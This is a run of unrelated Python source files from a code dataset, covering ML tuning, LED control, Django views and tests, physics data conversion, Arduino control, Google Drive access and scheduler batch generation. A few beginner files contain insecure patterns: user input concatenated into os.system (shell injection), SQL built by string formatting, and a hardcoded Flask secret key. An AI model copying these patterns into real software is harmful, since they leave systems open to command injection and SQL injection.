test_size=.2)\n\nclf = RandomForestClassifier()\nparameter_grid = {\"min_samples_split\": [2, 3, 4]}\n\ntune_search = TuneGridSearchCV(\n clf,\n parameter_grid,\n early_stopping=True,\n max_iters=20,\n)\ntune_search.fit(x_train, y_train)\n\npred = tune_search.predict(x_test)\naccuracy = np.count_nonzero(np.array(pred) == np.array(y_test)) / len(pred)\nprint(accuracy)\n","sub_path":"examples/warm_start_ensemble.py","file_name":"warm_start_ensemble.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"314783261","text":"# -*- coding: utf-8 -*-\n\nimport time\nfrom rpi_ws281x import Adafruit_NeoPixel\nfrom rpi_ws281x import Color\n\nclass Leds:\n def __init__(self, count, pin=21, br=100):\n \"\"\"\n LEDs\n \"\"\"\n self.LED_COUNT = count\n LED_PIN = pin # GPIO пин, к которому вы подсоединяете светодиодную ленту\n LED_FREQ_HZ = 800000 # LED signal frequency in hertz (usually 800khz)\n LED_DMA = 10 # DMA channel to use for generating signal (try 10)\n LED_BRIGHTNESS = br # Set to 0 for darkest and 255 for brightest\n LED_INVERT = False # True to invert the signal (when using NPN transistor level shift)\n LED_CHANNEL = 0 # Set to '1' for GPIOs 13, 19, 41, 45 or 53\n\n self.strip = Adafruit_NeoPixel(self.LED_COUNT, LED_PIN, LED_FREQ_HZ, LED_DMA, LED_INVERT)\n self.strip.begin()\n def setPixelsColor(self, color):\n for i in range(self.strip.numPixels()):\n self.strip.setPixelColor(i, color)\n self.strip.show()\n\n def setPixelColor(self, color):\n self.strip.setPixelColor(i, color)\n self.strip.show()\n\n def colorWipe(self, color, wait_ms=50):\n \"\"\"Wipe color across display a pixel at a time.\"\"\"\n for i in range(self.strip.numPixels()):\n self.strip.setPixelColor(i, color)\n self.strip.show()\n time.sleep(wait_ms/1000.0)","sub_path":"demo_task/Leds.py","file_name":"Leds.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"21484014","text":"from django.test import TestCase\nfrom . import factories\n\n\nclass TestGame(TestCase):\n def test_factory(self):\n game = factories.GameFactory(name=\"Quake 3 Arena\")\n self.assertEqual(game.slug, \"quake-3-arena\")\n self.assertFalse(game.is_public)\n\n\nclass TestGameLibrary(TestCase):\n def test_library_generated_by_user(self):\n user = factories.UserFactory(first_name=\"test\")\n\n library = user.gamelibrary\n self.assertEqual(len(library.games.all()), 0)\n for i in range(5):\n game = factories.GameFactory()\n library.games.add(game)\n\n self.assertEqual(len(library.games.all()), 5)\n\n def test_library_generated_by_factory(self):\n games = [factories.GameFactory() for i in range(5)]\n library = factories.GameLibraryFactory(games=games)\n self.assertEqual(len(library.games.all()), 5)\n","sub_path":"games/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"578303932","text":"import argparse\n\nfrom root_numpy import root2array\n\nimport numpy as np\nimport h5py\nfrom tqdm import tqdm\n\nfrom rnn_tauid.common import cuts\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"outfile\",\n help=\"Output file\")\n parser.add_argument(\"selection\",\n choices=[\"truth1p\", \"1p\",\n \"truth3p\", \"3p\",\n \"truthXp\", \"Xp\"],\n help=\"Selection to apply to the taus\")\n parser.add_argument(\"infiles\", nargs=\"+\",\n help=\"Input root files with flattened containers\")\n\n return parser.parse_args()\n\n\n# Global config\ntreename = \"CollectionTree\"\ndefault_value = 0\nn_tracks = 12\nn_clusters = 8\n\n\n# h5py dataset kwargs\nh5opt = {\n \"compression\": \"gzip\",\n \"compression_opts\": 9,\n \"shuffle\": True,\n \"fletcher32\": True\n}\n\n\nif __name__ == \"__main__\":\n args = get_args()\n\n # Load here to avoid root taking over the command line\n from root_numpy import root2array, list_branches\n\n # Branches to load\n branches = list_branches(args.infiles[0], treename=treename)\n jet_branches = [br for br in branches if br.startswith(\"TauJets\")]\n track_branches = [br for br in branches if br.startswith(\"TauTracks\")]\n cluster_branches = [br for br in branches if br.startswith(\"TauClusters\")]\n\n # Tau selection\n sel = cuts.sel_dict[args.selection]\n\n with h5py.File(args.outfile, \"w\", driver=\"family\", memb_size=10*1024**3) as outf:\n # Number of events after selection\n n_events = None\n seed = 1234567890\n\n # Jet\n for br in tqdm(jet_branches, desc=\"Jets\"):\n data = root2array(args.infiles, treename=treename, branches=br,\n selection=sel)\n data = data.astype(np.float32)\n\n # Check if same number of events and shuffle\n if n_events:\n assert n_events == len(data)\n else:\n n_events = len(data)\n\n random_state = np.random.RandomState(seed=seed)\n random_state.shuffle(data)\n\n outf.create_dataset(\"{}/{}\".format(*br.split(\".\")), data=data,\n dtype=np.float32, **h5opt)\n\n # Track\n mask = root2array(args.infiles, treename=treename,\n branches=(\"TauTracks.pt\", default_value, n_tracks),\n selection=sel)\n mask = mask <= 0\n\n for br in tqdm(track_branches, desc=\"Tracks\"):\n data = root2array(args.infiles, treename=treename,\n branches=(br, default_value, n_tracks),\n selection=sel)\n data = data.astype(np.float32)\n\n # Set nan\n data[mask] = np.nan\n\n # Check if same number of events and shuffle\n if n_events:\n assert n_events == len(data)\n else:\n n_events = len(data)\n\n random_state = np.random.RandomState(seed=seed)\n random_state.shuffle(data)\n\n outf.create_dataset(\"{}/{}\".format(*br.split(\".\")),\n data=data, dtype=np.float32, **h5opt)\n\n # Cluster\n mask = root2array(args.infiles, treename=treename,\n branches=(\"TauClusters.et\", default_value, n_clusters),\n selection=sel)\n mask = mask <= 0\n\n for br in tqdm(cluster_branches, desc=\"Clusters\"):\n data = root2array(args.infiles, treename=treename,\n branches=(br, default_value, n_clusters),\n selection=sel)\n data = data.astype(np.float32)\n\n # Set nan\n data[mask] = np.nan\n\n # Check if same number of events and shuffle\n if n_events:\n assert n_events == len(data)\n else:\n n_events = len(data)\n\n random_state = np.random.RandomState(seed=seed)\n random_state.shuffle(data)\n\n outf.create_dataset(\"{}/{}\".format(*br.split(\".\")),\n data=data, dtype=np.float32, **h5opt)\n","sub_path":"scripts/create_sample.py","file_name":"create_sample.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"512827708","text":"from django.shortcuts import render, render_to_response, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.mail import EmailMessage\nfrom django.template.loader import get_template\nfrom django.conf import settings\nfrom django.http import HttpResponse\nfrom django.template import loader, RequestContext\n\nfrom sendgrid import SendGridAPIClient\nfrom sendgrid.helpers.mail import Mail\n\nimport os\nimport logging\n\nfrom .models import *\n\nfrom .forms import *\n\nlogger = logging.getLogger(__name__)\n\ndef index(request):\n contact_form = ContactForm\n portfolio_section = PortfolioSection.objects.all()[:6]\n\n header_section = HeaderSection.objects.filter(pk=1).values('master_heading', 'sub_heading')[0]\n about_section = AboutSection.objects.filter(pk=1).values()[0]\n master_heading = header_section['master_heading']\n sub_heading = header_section['sub_heading']\n programming_language_list = about_section['programming_language'].split(',')\n database_management_list = about_section['database_management'].split(',')\n markup_and_styling_language_list = about_section['markup_and_styling_language'].split(',')\n framework_list = about_section['framework'].split(',')\n\n return render(request, 'index.html', \n {'contact_form': contact_form, 'portfolio_section': portfolio_section, 'master_heading': master_heading, 'sub_heading': sub_heading,\n 'programming_language_list': programming_language_list, 'database_management_list': database_management_list, \n 'markup_and_styling_language_list': markup_and_styling_language_list, 'framework_list': framework_list})\n\ndef send_message(request):\n if request.method == 'POST':\n try:\n contact_form = ContactForm(request.POST)\n if contact_form.is_valid():\n name = request.POST['name']\n email = request.POST['email']\n message = request.POST['message']\n\n content = 'Name: %s\\nEmail: %s\\nMessage: %s' % (name, email, message)\n message = Mail(\n from_email='contact.alpolinar@shaw.ca',\n to_emails='alpolinar@gmail.com',\n subject=\"New message from portfolio site.\", \n html_content=content)\n try:\n sg = SendGridAPIClient(settings.SENDGRID_API_KEY)\n response = sg.send(message)\n return HttpResponse(response.status_code)\n except Exception as e:\n logger.error('sg: %s', e)\n return HttpResponse('sent')\n else:\n return HttpResponse('not valid')\n except Exception as e:\n logger.error('error: %s', str(e))\n else:\n return HttpResponse('test')\n return HttpResponse('default')\n\ndef handler404(request, *args, **argv):\n response = render(request, '404.html')\n response.status_code = 404\n return response\n\ndef handler500(request, *args, **argv):\n response = render(request, '500.html')\n response.status_code = 500\n return response","sub_path":"project_manager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"634893778","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\n Examples for the NURBS-Python Package\n Released under MIT License\n Developed by Onur Rauf Bingol (c) 2016-2017\n\n This example is contributed by John-Eric Dufour (@jedufour)\n\"\"\"\n\nfrom nurbs import Surface as ns\nfrom nurbs import utilities as utils\nfrom nurbs import factories as fact\nfrom matplotlib import pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n# Create a NURBS surface instance\n#surf = fact.from_file(\"data/CP_Surface1.json\")\nsurf = fact.from_file(\"data/CP_Surface2.json\")\nsurf.evaluate()\n\n# Arrange calculated surface data for plotting\nsurfpts_x = []\nsurfpts_y = []\nsurfpts_z = []\nfor spt in surf.surfpts:\n surfpts_x.append(spt[0])\n surfpts_y.append(spt[1])\n surfpts_z.append(spt[2])\n\n# Plot using Matplotlib\nfig = plt.figure(figsize=(10.67, 8), dpi=96)\nax = fig.gca(projection='3d')\n#surfplt = ax.scatter(surfpts_x, surfpts_y, surfpts_z, c=\"red\", s=10, depthshade=True) # 3D Scatter plot\nsurfplt = ax.plot_trisurf(surfpts_x, surfpts_y, surfpts_z, cmap=plt.cm.viridis) # 3D Tri-Surface plot\nax.set_xlim(-25, 25)\nax.set_ylim(-25, 25)\nax.set_zlim(-15, 15)\nplt.show()\n\nprint(\"End of NURBS-Python Example\")\n","sub_path":"ex_surface04.py","file_name":"ex_surface04.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"370653305","text":"from card import Card, Suit\nfrom deck import Deck\n\nif __name__ == \"__main__\":\n deck = Deck.empty()\n\n # Add first card, ace of spades\n deck.add_after(None, Card(Suit.SPADES, 1))\n\n # Add J of Diamonds before the previous one\n # It becomes the head of the deck\n deck.add_before(deck.head.card, Card(Suit.DIAMONDS, 11))\n\n # Add 2 of Hearts after J of Diamonds\n deck.add_after(deck.head.card, Card(Suit.HEARTS, 2))\n\n # Add 4 of Clubs after 2 of Hearts\n deck.add_after(Card(Suit.HEARTS, 2), Card(Suit.CLUBS, 4))\n\n # Add 9 of Diamonds before 2 of Hearts\n deck.add_before(Card(Suit.HEARTS, 2), Card(Suit.DIAMONDS, 9))\n\n # Remove 4 of Clubs from the deck\n deck.delete(Card(Suit.CLUBS, 4))\n\n # Try to find 4 of Clubs\n four_of_clubs = deck.find(Card(Suit.CLUBS, 4))\n\n # Find J of Diamonds\n j_of_diamonds = deck.find(Card(Suit.DIAMONDS, 11))\n\n print(f'Found 4 of Clubs? {four_of_clubs}')\n print(f'Found J of Diamonds? {j_of_diamonds}')\n\n # Uncomment the two lines below to get a full deck\n # deck = Deck.empty()\n # deck.fill()\n\n \"\"\" deck.add_after(None, Card(Suit.CLUBS, 4))\n print(f'Head: {deck.head}')\n\n deck.add_before(Card(Suit.CLUBS, 4), Card(Suit.DIAMONDS, 11))\n\n print(f'Head: {deck.head}')\n print(f'Tail: {deck.tail}') \"\"\"\n\n deck.traverse_backwards()","sub_path":"Part_A/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"547200726","text":"#!/usr/bin/env python2.7\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 27 09:41:33 2015\n\n@author: nicolas\n\"\"\"\n\nfrom __future__ import division\n\nimport json as j\n\nimport pylab as pl\n\nimport lib.physical_model as pm\nfrom lib.EngineClass import SolverClass\nfrom lib.path_project import conf_dir\n\nModel = pm.Chris2DModel\nmodelname = 'Saint_Venant_vg_hydro2fields'\n\ntry:\n conf = j.load(open(conf_dir / 'data_%s.json' % modelname, 'r'))\nexcept:\n from lib.configclass import ConfigWindow\n conf_windows = ConfigWindow().configure_traits()\n conf = conf_windows.get()\n\nphysical_data = conf['physical']\nnumerical_conf = conf['numerical']\nsolver_conf = conf['solver']\nsurface = conf['surface']\ninitial = conf['initial']\n\nmodel = Model()\n\n# print(sp.printing.fcode(model.dummy_time_syseq.values()[1], standard=95))\n\n##########################\n\nsolver = SolverClass(model)\npl.ion()\nsolver.update_initial_fields(conf)\nsolver.start()\n","sub_path":"info_models.py","file_name":"info_models.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"94033718","text":"\nfrom flask import Flask\nfrom flask import request,render_template\nfrom flask_json import FlaskJSON, JsonError, json_response, as_json\nimport serial \nimport time\n\n\napp = Flask(__name__)\nFlaskJSON(app)\n\narduino = serial.Serial('/dev/ttyACM1', 9600)\n\n\ndef onOffFunction(command):\n\tif command ==\"on\":\n\t\tprint(\"Abrindo a Porta...\")\n\t\ttime.sleep(1) \n\t\tarduino.write(b'H') \n\telif command ==\"off\":\n\t\tprint(\"Fechando a Porta...\")\n\t\ttime.sleep(1) \n\t\tarduino.write(b'L')\n\telif command ==\"bye\":\n\t\tprint(\"Adeus!...\")\n\t\ttime.sleep(1) \n\t\tarduino.close()\n\n\n@app.route(\"/controller\", methods=['GET'])\ndef onOffArduino():\n if(request.args.get('command') == \"on\"):\n onOffFunction(\"on\")\n return json_response(status=200)\n elif(request.args.get('command') == \"off\"):\n onOffFunction(\"off\")\n return json_response(status=200)\n else:\n return json_response(status=404)\n\n@app.route(\"/\", methods=['GET'])\ndef home():\n return render_template(\"index.html\")\n\n\nif __name__ == '__main__':\n app.run()","sub_path":"scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"117046725","text":"import os\r\nimport time\r\nos.system(\"echo please type yes in the selection of choices\")\r\nsource = input(\"type to the drive you would like to copy from:\")\r\ndestination = input(\"type to the drive you would like to copy to:\")\r\nos.system(\"xcopy /v \" + source + \" \" + destination)\r\ntime.sleep(3)\r\nos.system(\"pause\")\r\nos.system(\"echo Done copying.\")\r\n\r\n\r\n \r\n","sub_path":"copy.py","file_name":"copy.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"166582916","text":"import os\nfrom pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\n\n\nclass DriveFileStream:\n def __init__(self):\n os.chdir(os.path.dirname(os.path.abspath(__file__)))\n gauth = GoogleAuth()\n gauth.LocalWebserverAuth()\n self.drive = GoogleDrive(gauth)\n self.rootPath = \"1UYFcpHPmQCjYGCaPeCYtRaUHR05hvV-h\"\n self.rawPath = \"1fBnc2kKf0msus4N7-TYZEUha503pgtly\"\n self.minifyPath = \"1wMQQIUNx5qKkkZth-cjfypWqtAj-Ys6J\"\n self.errorLogPath = \"1aRaYF9-erEV-Vnya36eRzLl43MVpgZw9\"\n\n def get_id(self, path):\n dirid = \"\"\n folder, title = path.split(\"/\")\n if folder == \"raw\":\n dirid = self.rawPath\n elif folder == \"minify\":\n dirid = self.minifyPath\n elif folder == \"root\":\n dirid = self.rootPath\n elif folder == \"errorLog\":\n dirid = self.errorLogPath\n return dirid, title\n\n def search_cloud_file(self, path):\n dirid, title = self.get_id(path)\n file_list = self.drive.ListFile({\"q\": \"'%s' in parents and title = '%s'\" % (dirid, title)}).GetList()\n return file_list\n\n def get_file(self, path):\n file_list = self.search_cloud_file(path)\n if len(file_list) != 0:\n file = self.drive.CreateFile({\"id\": file_list[0][\"id\"]})\n return file\n else:\n dirid, title = self.get_id(path)\n file = self.drive.CreateFile({\"parents\": [{\"id\": dirid}], \"title\": title})\n return file\n\n def load_file(self, path):\n file = self.get_file(path)\n return file.GetContentString()\n\n def save_file(self, path, content):\n file = self.get_file(path)\n file.SetContentString(content)\n file.Upload()\n\n\ndrive = DriveFileStream()\ndrive.save_file(\"errorLog/hoge.txt\", \"hogehoge\")\n","sub_path":"DriveFileStream.py","file_name":"DriveFileStream.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272823277","text":"from flask import Flask, render_template, url_for\nfrom forms import RegistrationForm, QuizzerLoginForm\napp = Flask(__name__)\n\napp.config['SECRET_KEY'] = 'dsafbhj34y678bdfvehy3487b'\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template('home.html', title='Home')\n\n@app.route(\"/about\")\ndef about():\n return render_template('about.html', title='About')\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n form = RegistrationForm()\n return render_template('register.html', title='Register', form=form)\n\n@app.route(\"/quizzerlogin\")\ndef quizzerlogin():\n form = QuizzerLoginForm()\n return render_template('quizzerlogin.html', title='Quizzer Login', form=form)\n\nif __name__ == '__main__':\n\tapp.run(debug=True)","sub_path":"quizapp.py","file_name":"quizapp.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"494198615","text":"import sqlite3\n\nclass SqliteManager:\n def __init__(self, db_name, table_name):\n self.db_name = db_name\n self.table_name = table_name\n self.connector = sqlite3.connect(self.db_name)\n\n\n def __del__(self):\n self.connector.close()\n\n\n def set_table_name(table_name):\n self.table_name = table_name\n\n\n def select_all(self):\n sql = \"select * from %s\" % self.table_name\n cursor = self.connector.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n\n for row in result:\n print(\"===== Hit! =====\")\n for column in row:\n print(column)\n\n cursor.close()\n\n\n def select(self, columns):\n sql = \"select %s from %s\" % (columns, self.table_name)\n cursor = self.connector.cursor()\n cursor.execute(sql)\n result = cursor.fetchall()\n\n for row in result:\n print(\"===== Hit! =====\")\n for column in row:\n print(column)\n\n cursor.close()\n\n\n def insert(self, columns, values):\n sql = \"insert into %s(%s) values(%s)\" % (self.table_name, columns, values)\n self.connector.execute(sql)\n self.connector.commit()\n","sub_path":"python/SqliteManager.py","file_name":"SqliteManager.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"367883707","text":"import json\n\n\nclass Tree_structure:\n \"\"\"\n Tree structure use in the algorithm\n tree: tree structure\n tree_data: external data need it\n \"\"\"\n\n def __init__(self, nums):\n self.tree = {}\n self.tree_data = []\n self.num1 = nums[0]\n self.num2 = nums[1]\n\n def __getitem__(self, item):\n \"\"\"\n Get element of the tree like an array or tree\n :param item: index of element (can be a int or a str)\n :return: The elemt\n \"\"\"\n item = str(item)\n return self.tree[item]\n\n def __setitem__(self, item, value):\n \"\"\"\n Set element of the tree with a value\n :param item: index of the element (can be a int or a str)\n :param value: value of the element\n :return:\n \"\"\"\n item = str(item)\n self.tree[item] = value\n\n def __len__(self):\n return len(self.tree)\n\n def save(self, path):\n \"\"\"\n Save the tree in a json file\n :param path: path where to save the json file\n :return:\n \"\"\"\n aux = {}\n # We need to convert floats into string for JSON\n for j, t in enumerate(self.tree):\n aux[j] = self.tree[t]\n aux[j]['point'] = list([str(i) for i in aux[j]['point']])\n aux[j]['mu'] = list([str(i) for i in aux[j]['mu']])\n aux[j]['std'] = list([str(i) for i in aux[j]['std']])\n\n with open(path + str(self.num1) + \"-\" + \\\n str(self.num2) + '.json', 'w') as f:\n json.dump(aux, f)","sub_path":"src/python_code/compostela/tree_structure.py","file_name":"tree_structure.py","file_ext":"py","file_size_in_byte":1548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"387378146","text":"import random\n\ndef lotePrioridadCreciente(cantTareas, salida, gapTareas, durTareas):\n # cantTareas % 5 == 0\n fOut = open(salida, 'w')\n mod = cantTareas/5\n tiempo = 0\n for i in range(5):\n for k in reversed(range(1,mod+1)):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskPriorizada '+str(5-i)+' '+str(durTareas*k)+'\\n')\n tiempo += gapTareas\n\ndef lotePrioridadDecreciente(cantTareas, salida, gapTareas, durTareas):\n # cantTareas % 5 == 0\n fOut = open(salida, 'w')\n mod = cantTareas/5\n tiempo = 0\n for i in range(1,6):\n for k in range(1,mod+1):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskPriorizada '+str(i)+' '+str(durTareas*k)+'\\n')\n tiempo += gapTareas\n\ndef lotePrioridadRnd(cantTareas, salida, gapTareas):\n # cantTareas % 5 == 0\n fOut = open(salida, 'w')\n mod = cantTareas/5\n tiempo = 0\n for i in range(5):\n for k in range(1,mod+1):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskPriorizada '+str(random.randint(1, 5))+' '+str(random.randint(1, 10))+'\\n')\n tiempo += gapTareas\n\ndef loteGrande(cantTareas,salida):\n fOut = open(salida, 'w')\n for i in range(cantTareas):\n fOut.write('@0:\\n')\n fOut.write('TaskIO '+str(random.randint(1, 8))+' '+str(random.randint(1, 5))+'\\n')\n\ndef loteMisteryNoOrder(cantTareas,salida,gapTareas):\n fOut = open(salida, 'w')\n tiempo = 0\n for i in range(cantTareas):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskCPU '+str(cantTareas-i)+'\\n')\n tiempo += gapTareas\n\ndef loteMisteryInOrder(cantTareas,salida,gapTareas):\n fOut = open(salida, 'w')\n tiempo = 0\n for i in range(cantTareas):\n fOut.write('@'+str(tiempo)+':\\n')\n fOut.write('TaskCPU '+str(i+1)+'\\n')\n tiempo += gapTareas\n\ndef loteControl(cantTareas,salida):\n fOut = open(salida, 'w')\n for i in range(cantTareas):\n fOut.write('@'+str(random.randint(1, cantTareas))+':\\n')\n fOut.write('TaskCPU '+str(random.randint(1, 10))+'\\n')\n\n\n#lotePrioridadDecreciente(10,'LotePrioDec',2,3)\n#lotePrioridadCreciente(10,'LotePrioCre',2,3)\n#lotePrioridadRnd(10,'LotePrioRnd',2)\n#loteGrande(25,'LoteGrande')\n#loteMisteryNoOrder(10,'LoteMysNoOrder',2)\nloteMisteryInOrder(10,'LoteMysInOrder',2)\n#loteControl(10,'LoteControl')\n","sub_path":"Sistemas Operativos/so-tp1-master/loteGen.py","file_name":"loteGen.py","file_ext":"py","file_size_in_byte":2413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"253475037","text":"\"\"\"\nBuilds out an arugment parser based on function signatures in various modules.\nEach module is mapped to a sub-command name space, and each function of that\nmodule is mapped to an operation of that sub command. Parameters to that\nfunction are made into command line arguments. Invocation looks like:\n\n\ncommand sub-command operation REQUIRED_ARG [...] [--OPTIONAL-ARG VAL]\n\"\"\"\nimport argparse\nimport inspect\nimport logging\nimport sys\n\n\ndef _coerce_bool(some_str):\n \"\"\"Stupid little method to try to assist casting command line args to\n booleans\n \"\"\"\n if some_str.lower().strip() in ['n', 'no', 'off', 'f', 'false', '0']:\n return False\n return bool(some_str)\n\n\nclass Newman(object):\n '''Container class to hold a bunch of customized (sub)parsers\n '''\n # TODO: Move this to some kind of optional plugin? Don't want to require\n # Raven for folks who aren't using sentry.\n def register_sentry_handler(self, sentry_dns, log_level=logging.ERROR):\n from raven.handlers.logging import SentryHandler\n sentry_handler = SentryHandler(sentry_dns)\n sentry_handler.setLevel(log_level)\n self.logger.addHandler(sentry_handler)\n\n def __init__(self, description=\"A parser nobody bothered to customize\",\n sentry_dns=None, top_level_args=None):\n \"\"\"Build an argument parser from module definitions and run the\n function we were asked for\n\n `top_level_args` should be a dictionary of argument name: default value\n that will be handled by the function that instantiates Newman instead\n of the operation that is ultimately called.\n Use case: global config options/paths\n \"\"\"\n self.logger = logging.getLogger()\n self.parser = argparse.ArgumentParser(\n description=description,\n add_help=True,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n\n self.sub_parsers = self.parser.add_subparsers(\n title='task modules',\n description='The following modules were loaded as task namespaces',\n dest='module'\n )\n if sentry_dns:\n self.register_sentry_handler(sentry_dns)\n\n self.default_top_level_args = top_level_args or {}\n for targ, default in top_level_args.items():\n arg_type = type(default)\n if isinstance(default, bool):\n arg_type = _coerce_bool\n self.parser.add_argument('--' + targ.replace('_', '-'),\n type=arg_type, default=default)\n\n self._parsed_args = None\n\n @property\n def func(self):\n if not self._parsed_args:\n self.parse_args()\n return self._parsed_args['func']\n\n @property\n def real_args(self):\n if not self._parsed_args:\n self.parse_args()\n return self._parsed_args['real_args']\n\n @property\n def top_level_args(self):\n if not self._parsed_args:\n self.parse_args()\n return self._parsed_args['top_level_args']\n\n def parse_args(self):\n \"\"\"Generates a dictionary of parsed arguments.\n\n `func` is the operation to be run.\n `top_level_args` is a dict of any arguments that are used in the\n calling proces.\n `real_args` are the arguments that the operation will be invokes with.\n \"\"\"\n args = self.parser.parse_args() # oh the possibilities...\n func = args.func # this gets plumbed through by load_module\n real_args = [] # actual positional args we'll be sending to func\n top_level_args = {} # args to be used by caller process, not operation\n\n # yay, even more weird signature hacking. Try to turn the argparse\n # arguments we got (if any) back into regular function arguments\n fargs, varargs, null, fdefaults = inspect.getargspec(func)\n\n for targ in self.default_top_level_args:\n if hasattr(args, targ):\n top_level_args[targ] = getattr(args, targ)\n for farg in fargs:\n if hasattr(args, farg):\n # this function cares about this passed in arg\n real_args.append(getattr(args, farg))\n if varargs:\n # this func takes varags\n real_args += getattr(args, varargs)\n\n self._parsed_args = {\n 'func': func,\n 'top_level_args': top_level_args,\n 'real_args': real_args\n }\n\n def go(self):\n \"\"\"Call this in your CLI entry point once you've loaded all your tasks\n (via load_module()). It will parse any command line args, choose the\n correct function to call, and call it with your arguments, then exit.\n If the arguments specify an unknown command, the usage help will be\n printed and the program will exit with code 1\n \"\"\"\n real_args = self.real_args\n func = self.func\n\n exit_code = 2\n if func:\n try:\n exit_code = func(*real_args)\n except Exception as e:\n self.logger.exception(\"%s (in loaded task)\", e)\n raise\n sys.exit(exit_code)\n\n def load_module(self, module, sub_command):\n \"\"\"Load tasks from the given module, and makes them available under the\n given subcommand.\n Build the argument parser for the collected tasks. The sub-parsers get\n attached to the passed in top level parser under the previously\n registered sub-commands.\n\n\n :param str module_name: python style module name - foo.bar.baz\n :param str sub_command: the command name to associate with this module\n :param top_level: The configured top level command parser\n :type top_level: argparse.ArgumentParser\n \"\"\"\n # Add a sub-parser for this sub-command\n mod_parser = self.sub_parsers.add_parser(\n sub_command,\n description=module.__doc__,\n help=module.__doc__\n )\n mod_sub_parsers = mod_parser.add_subparsers(\n title='tasks under %s' % sub_command,\n help='The following are valid task commands',\n dest='cmd'\n )\n\n for func_name, func_obj in inspect.getmembers(module,\n inspect.isfunction):\n # skip if we are looking at a private function\n if func_name.startswith('_'):\n continue\n # TODO: Not sure what to do about this\n if (not inspect.getmodule(func_obj).__name__.endswith(\n module.__name__)):\n # this check tries to avoid functions at the module level that\n # were imported and not defined in that module\n continue\n # give each function it's own sub parser under its parent module\n # and try to provide options based on the function signature\n func_parser = mod_sub_parsers.add_parser(\n func_name,\n help=func_obj.__doc__,\n formatter_class=argparse.ArgumentDefaultsHelpFormatter\n )\n func_parser.set_defaults(func=func_obj)\n\n # get the signature of the method we're setting up\n args, varargs, _, defaults = inspect.getargspec(func_obj)\n if varargs:\n # used if a function accepts *args\n func_parser.add_argument(varargs, nargs='*')\n\n if defaults:\n # defaults arrives as a tuple of argument defaults, but it's\n # indexed from the furthest right argument. So it's possible\n # you may get ['arg1', 'arg2'] as the args and (10,) as the\n # defaults, where 10 is the default value for arg2. Confusing\n # and weird, yes.\n defaults = list(defaults)\n defaults.reverse()\n\n # now for each argument we found, go backwards (see above for why)\n positionals = []\n for cnt, arg in enumerate(reversed(args)):\n if defaults and cnt < len(defaults):\n # we're basically going backwards, but the arg parser\n # doesn't care so this works. The signature made this\n # optional, so try to make an educated guess as to the type\n # of variable\n kwargs = {\n 'help': 'taken from signature',\n 'default': defaults[cnt],\n }\n if isinstance(defaults[cnt], bool):\n kwargs['type'] = _coerce_bool\n elif defaults[cnt] is None:\n pass\n else:\n kwargs['type'] = type(defaults[cnt])\n func_parser.add_argument(\"--%s\" % arg.replace(\"_\", \"-\"),\n **kwargs)\n else:\n # this is a positional arg, that we know pretty much\n # nothing about\n positionals.append(arg)\n # Finally reverse the positional args again, so they're in the\n # right order\n for arg in reversed(positionals):\n func_parser.add_argument(arg, help='taken from signature')\n","sub_path":"newman/newman.py","file_name":"newman.py","file_ext":"py","file_size_in_byte":9343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"646689339","text":"from rest_framework.response import Response\r\n\r\n\r\nclass APIResponse(Response):\r\n def __init__(self, code=200, msg='成功', status=None, headers=None, **kwargs):\r\n res_data = {\r\n 'code': code,\r\n 'msg': msg,\r\n }\r\n if kwargs:\r\n res_data.update(kwargs)\r\n super().__init__(data=res_data, status=status, 